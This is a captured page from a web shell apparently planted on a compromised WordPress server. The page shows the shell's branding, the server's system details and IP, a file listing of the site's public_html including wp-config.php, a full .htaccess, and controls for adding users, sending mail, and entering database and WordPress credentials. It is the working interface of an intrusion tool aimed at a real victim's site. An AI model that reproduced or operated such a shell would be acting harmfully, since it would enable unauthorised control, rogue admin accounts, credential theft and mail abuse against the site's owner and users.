System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-x---
]
:
/
home
/
ontikmqz
/
public_html
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
.htaccess
# BEGIN WP Rocket v3.13.3 # Use UTF-8 encoding for anything served text/plain or text/html AddDefaultCharset UTF-8 # Force UTF-8 for a number of file formats <IfModule mod_mime.c> AddCharset UTF-8 .atom .css .js .json .rss .vtt .xml </IfModule> # FileETag None is not enough for every server. <IfModule mod_headers.c> Header unset ETag </IfModule> # Since we’re sending far-future expires, we don’t need ETags for static content. # developer.yahoo.com/performance/rules.html#etags FileETag None <IfModule mod_alias.c> <FilesMatch "\.(html|htm|rtf|rtx|txt|xsd|xsl|xml)$"> <IfModule mod_headers.c> Header set X-Powered-By "WP Rocket/3.13.3" Header unset Pragma Header append Cache-Control "public" Header unset Last-Modified </IfModule> </FilesMatch> <FilesMatch "\.(css|htc|js|asf|asx|wax|wmv|wmx|avi|bmp|class|divx|doc|docx|eot|exe|gif|gz|gzip|ico|jpg|jpeg|jpe|json|mdb|mid|midi|mov|qt|mp3|m4a|mp4|m4v|mpeg|mpg|mpe|mpp|otf|odb|odc|odf|odg|odp|ods|odt|ogg|pdf|png|pot|pps|ppt|pptx|ra|ram|svg|svgz|swf|tar|tif|tiff|ttf|ttc|wav|wma|wri|xla|xls|xlsx|xlt|xlw|zip)$"> <IfModule mod_headers.c> Header unset Pragma Header append Cache-Control "public" </IfModule> </FilesMatch> </IfModule> <IfModule mod_mime.c> AddType image/avif avif AddType image/avif-sequence avifs </IfModule> # Expires headers (for better cache control) <IfModule mod_expires.c> ExpiresActive on ExpiresDefault "access plus 1 month" # cache.appcache needs re-requests in FF 3.6 (thanks Remy ~Introducing HTML5) ExpiresByType text/cache-manifest "access plus 0 seconds" # Your document html ExpiresByType text/html "access plus 0 seconds" # Data ExpiresByType text/xml "access plus 0 seconds" ExpiresByType application/xml "access plus 0 seconds" ExpiresByType application/json "access plus 0 seconds" # Feed ExpiresByType application/rss+xml "access plus 1 hour" ExpiresByType application/atom+xml "access plus 1 hour" # Favicon (cannot be renamed) ExpiresByType image/x-icon "access plus 1 week" # Media: images, video, audio ExpiresByType image/gif "access plus 4 months" ExpiresByType image/png "access plus 4 months" ExpiresByType image/jpeg "access plus 4 months" ExpiresByType image/webp "access plus 4 months" ExpiresByType video/ogg "access plus 4 months" ExpiresByType audio/ogg "access plus 4 months" ExpiresByType video/mp4 "access plus 4 months" ExpiresByType video/webm "access plus 4 months" ExpiresByType image/avif "access plus 4 months" ExpiresByType image/avif-sequence "access plus 4 months" # HTC files (css3pie) ExpiresByType text/x-component "access plus 1 month" # Webfonts ExpiresByType font/ttf "access plus 4 months" ExpiresByType font/otf "access plus 4 months" ExpiresByType font/woff "access plus 4 months" ExpiresByType font/woff2 "access plus 4 months" ExpiresByType image/svg+xml "access plus 4 months" ExpiresByType application/vnd.ms-fontobject "access plus 1 month" # CSS and JavaScript ExpiresByType text/css "access plus 1 year" ExpiresByType application/javascript "access plus 1 year" </IfModule> # Gzip compression <IfModule mod_deflate.c> # Active compression SetOutputFilter DEFLATE # Force deflate for mangled headers <IfModule mod_setenvif.c> <IfModule mod_headers.c> SetEnvIfNoCase ^(Accept-EncodXng|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\s*,?\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding RequestHeader append Accept-Encoding "gzip,deflate" env=HAVE_Accept-Encoding # Don’t compress images and other uncompressible content SetEnvIfNoCase Request_URI \ \.(?:gif|jpe?g|png|rar|zip|exe|flv|mov|wma|mp3|avi|swf|mp?g|mp4|webm|webp|pdf)$ no-gzip dont-vary </IfModule> </IfModule> # Compress all output labeled with one of the following MIME-types <IfModule mod_filter.c> AddOutputFilterByType DEFLATE application/atom+xml \ application/javascript \ application/json \ application/rss+xml \ application/vnd.ms-fontobject \ application/x-font-ttf \ application/xhtml+xml \ application/xml \ font/opentype \ image/svg+xml \ image/x-icon \ text/css \ text/html \ text/plain \ text/x-component \ text/xml </IfModule> <IfModule mod_headers.c> Header append Vary: Accept-Encoding </IfModule> </IfModule> # END WP Rocket # BEGIN LSCACHE # END LSCACHE # BEGIN NON_LSCACHE # END NON_LSCACHE # BEGIN WordPress # The directives (lines) between "BEGIN WordPress" and "END WordPress" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress # BEGIN Security Block # Block the include-only files. <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^wp-admin/includes/ - [F,L] RewriteRule !^wp-includes/ - [S=3] RewriteRule ^wp-includes/[^/]+\.php$ - [F,L] RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L] RewriteRule ^wp-includes/theme-compat/ - [F,L] </IfModule> # Disable directory listing Options All -Indexes # Remove header with PHP version Header always unset X-Powered-By Header unset X-Powered-By # END Security Block # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81___lsphp .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-x---
2025-10-20 04:35:50
..
DIR
-
drwx--x--x
2025-10-01 01:49:30
.well-known
DIR
-
drwxr-xr-x
2022-07-17 02:47:04
wp-admin
DIR
-
drwxr-xr-x
2023-08-09 04:35:46
wp-content
DIR
-
drwxr-xr-x
2025-10-27 12:05:08
wp-includes
DIR
-
drwxr-xr-x
2025-04-16 05:44:33
.hcflag
text/plain
31 B
-rw-r--r--
2024-06-22 12:30:15
.htaccess
text/plain
6.37 KB
-rw-r--r--
2025-10-16 11:00:31
.htaccess.bk
text/plain
1.01 KB
-rw-r--r--
2022-07-17 09:53:55
.litespeed_flag
text/plain
297 B
-rw-r--r--
2024-06-24 02:25:54
bv_connector_9ff1bc5acb3477aa37462c3906dd3636.php
text/x-php
18.61 KB
-rwxr-xr-x
2024-04-04 07:30:09
error_log
text/plain
232.25 KB
-rw-r--r--
2025-10-25 07:07:25
index.php
text/x-php
405 B
-rw-r--r--
2020-02-06 05:03:12
license.txt
text/plain
19.44 KB
-rw-r--r--
2025-04-16 05:44:33
malcare-waf.php
text/x-php
407 B
-rw-r--r--
2024-07-18 05:05:23
readme.html
text/html
7.25 KB
-rw-r--r--
2025-10-01 05:44:36
wp-activate.php
text/x-php
7.21 KB
-rw-r--r--
2024-04-03 05:06:42
wp-blog-header.php
text/x-php
351 B
-rw-r--r--
2020-02-06 05:03:12
wp-comments-post.php
text/x-php
2.27 KB
-rw-r--r--
2023-08-09 04:35:45
wp-config-sample.php
text/x-php
3.26 KB
-rw-r--r--
2024-11-13 05:44:49
wp-config.php
text/x-php
3.21 KB
-rw-r--r--
2024-09-05 07:30:55
wp-cron.php
text/x-php
5.49 KB
-rw-r--r--
2024-11-13 05:44:49
wp-links-opml.php
text/x-php
2.44 KB
-rw-r--r--
2023-03-30 04:35:20
wp-load.php
text/x-php
3.84 KB
-rw-r--r--
2024-07-17 05:43:55
wp-login.php
text/x-php
50.21 KB
-rw-r--r--
2025-04-16 05:44:33
wp-mail.php
text/x-php
8.52 KB
-rw-r--r--
2025-04-16 05:44:33
wp-settings.php
text/x-php
29.38 KB
-rw-r--r--
2025-04-16 05:44:33
wp-signup.php
text/x-php
33.71 KB
-rw-r--r--
2025-04-16 05:44:33
wp-trackback.php
text/x-php
4.98 KB
-rw-r--r--
2024-11-13 05:44:49
xmlrpc.php
text/x-php
3.13 KB
-rw-r--r--
2025-04-16 05:44:33
~ ACUPOFTEA - mail.ontime-ae.com